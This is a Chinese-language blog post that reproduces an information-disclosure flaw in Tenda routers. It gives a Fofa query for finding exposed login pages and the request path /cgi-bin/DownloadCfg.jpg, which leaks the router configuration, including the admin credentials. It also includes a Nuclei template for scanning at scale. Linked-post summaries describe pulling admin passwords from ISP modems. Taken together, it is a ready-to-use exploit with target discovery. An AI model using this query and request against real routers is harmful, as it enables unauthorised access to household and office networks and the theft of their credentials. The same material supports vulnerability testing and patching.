漏洞复现之信息漏洞

已于 2023-12-04 15:29:55 修改
阅读量199 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络
于 2023-12-04 10:20:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134777223
版权

漏洞描述


Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。


漏洞复现


1、Fofa
title=”Tenda | LOGIN”

2、界面如下

3、POC
/cgi-bin/DownloadCfg.jpg
4、从配置中查找账户密码(直接打开JPG就行了)

5、成功登录如下

Nucle脚本

id: tenda-router-downloadcfg-infolink

info:
name: Tenda 路由器 DownloadCfg 信息泄露漏洞
author:
severity: high
description: Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。
reference:
- https://
metadata:
fofa-query: title="Tenda | LOGIN"
verified: true
max-request: 1

http:
- raw:
- |
GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"Please")'

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

渗透测试老鸟-九青
关注
专栏目录
CERIO-DT系列路由器Save.cgi接口命令注入漏洞(含批量验证poc)
weixin_43567873的博客
04-01 131
CERIO-DT系列路由器Save.cgi接口命令注入漏洞(含批量验证poc)
复现iis7/ii7.5的fastcgi解析漏洞
per_se_veran_ce的博客
08-28 1538
在windows server 2008 r2上搭建 php服务 1、下载php解释器 地址为http://windows.php.net/download/ 版本有两种,线程安全和非线程安全,线程安全是给apache用的,非线程安全是给iis用的,我们要配的是iis,所以下载非线程安全的,x86和x64看自己的机器是什么系统选择对应的版本下载就行了。 安装vcredist_x64.exe ...
vulhub漏洞复现五_cgi
weixin_44193247的博客
01-06 558
vulhub漏洞复现练习篇
漏洞复现--Tenda路由器DownloadCfg信息泄露
qq_53003652的博客
12-01 842
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。该产品存在信息泄露漏洞,攻击者可获得路由器后台账号密码。密码base64解码。
漏洞复现-Tenda 路由器
zkaqlaoniao的博客
12-05 495
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。4、从配置中查找账户密码(直接打开JPG就行了)免费领取安全学习资料包!帮助你在面试中脱颖而出。
Tenda路由器 信息泄露漏洞复现
最新发布
12-11 834
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。
电信光猫获取管理员密码
jarcem的博客
03-12 2万+
默认地址是 192.168.1.1 我自己改成了50.1http://192.168.50.1用普通账户密码登录http://192.168.50.1:/cgi-bin/baseinfoSet.cgi找到baseinfoSet_TELECOMPASSWORD后面的值就是ASCII码 自己对照翻译 或者写个脚本解开 ...
破解电信光猫 HG6201T 超管账号密码 (C语言源代码)
TRW777
02-12 2万+
1,登录路由器的banseinfo页面, 获取baseinfo信息baseinfo地址:http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi 2,通过对比路由器上明文标注的普通账号的密码, 猜出加密方式, 解析加密后的ascii编码 3,解析ascii编码,以&符号为分隔符, split字符串, 拿到数组, 每一个数字减去4就得到ascii编码,...
CGI详解(原理,配置及访问)
热门推荐
Code Young 的博客
03-09 3万+
一.基本原理 CGI:通用网关接口(Common Gateway Interface)是一个Web服务器主机提供信息服务的标准接口。通过CGI接口,Web服务器就能够获取客户端提交的信息,转交给服务器端的CGI程序进行处理,最后返回结果给客户端。 组成CGI通信系统的是两部分:一部分是html页面,就是在用户端浏览器上显示的页面。另一部分则是运行在服务器上的Cgi程序。 它们之间的通讯方式如
干货|最全的Tomcat漏洞复现
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
09-06 1661
简介Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开...
【笔记】获取中国电信家庭宽带烽火光猫HG221GS超级管理密码的方法步骤
柠檬很酸的博客
03-14 2万+
闲来无事想配置一下ipv6,需要光猫的超级管理密码,查了一下资料,做了如下整理和修正: 查看光猫后面板,确定设备型号HG221GS,默认终端配置地址192.168.1.1、账号useradmin、密码9CD2H; 根据设备型号HG221GS,上网查找资料,参考网上的方法,输入: http://192.168.1.1/cgi-bin/baseinfoSet.cgi 获...
敏感信息泄露
A182184的博客
12-20 343
portswigger靶场敏感信息泄露的一些实验,留下自己做的痕迹方便自己学习也希望能够帮助大家
Iis7.0 cgi解析漏洞复现
Bertram1994的博客
11-28 3455
Iis7.0 cgi解析漏洞复现 目标服务器IP 192.168.14.171 黑客机 172.18.199.27 1.首先,我们需要搭建IIS平台2.配置处理程序映射:管理工具 –> IIS -> WIN-UNI00QR5JE0 -> 处理程序映射 –> 添加模块映射. 配置如下:3.测试。我们在站点根目录下建立一个文件index.PHP。4.在真机172.18.199.27输入目标机IP
CGI漏洞利用
矿野上的脚印
07-18 1万+
CGI漏洞利用CGI漏洞是网管最容易乎视的地方,就我测试的这个网站上的漏洞, 我简单说一下,几个常见的漏洞地方。一般原理,解决方法,如果没有写全,请参考一些文献。 1,名字:?PageServices漏洞 这个漏洞是很多网站都有的。但是有好多人扫描出来确不知道如何运用,在此我简单谈一下吧,! 这个是可以显示页面清单的 方法是url/?PageServices 还可以这样试试 ! /?wp-cs-d
漏洞复现:验证、评估与安全实践的关键步骤
- 复现漏洞:根据收集的信息,构造并实施攻击手段,尝试在测试环境中触发漏洞。 - 结果分析:对复现过程进行细致分析,确认漏洞的存在,并评估其影响程度。 - 报告编写:最后,将整个过程整理成报告,记录测试环境、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值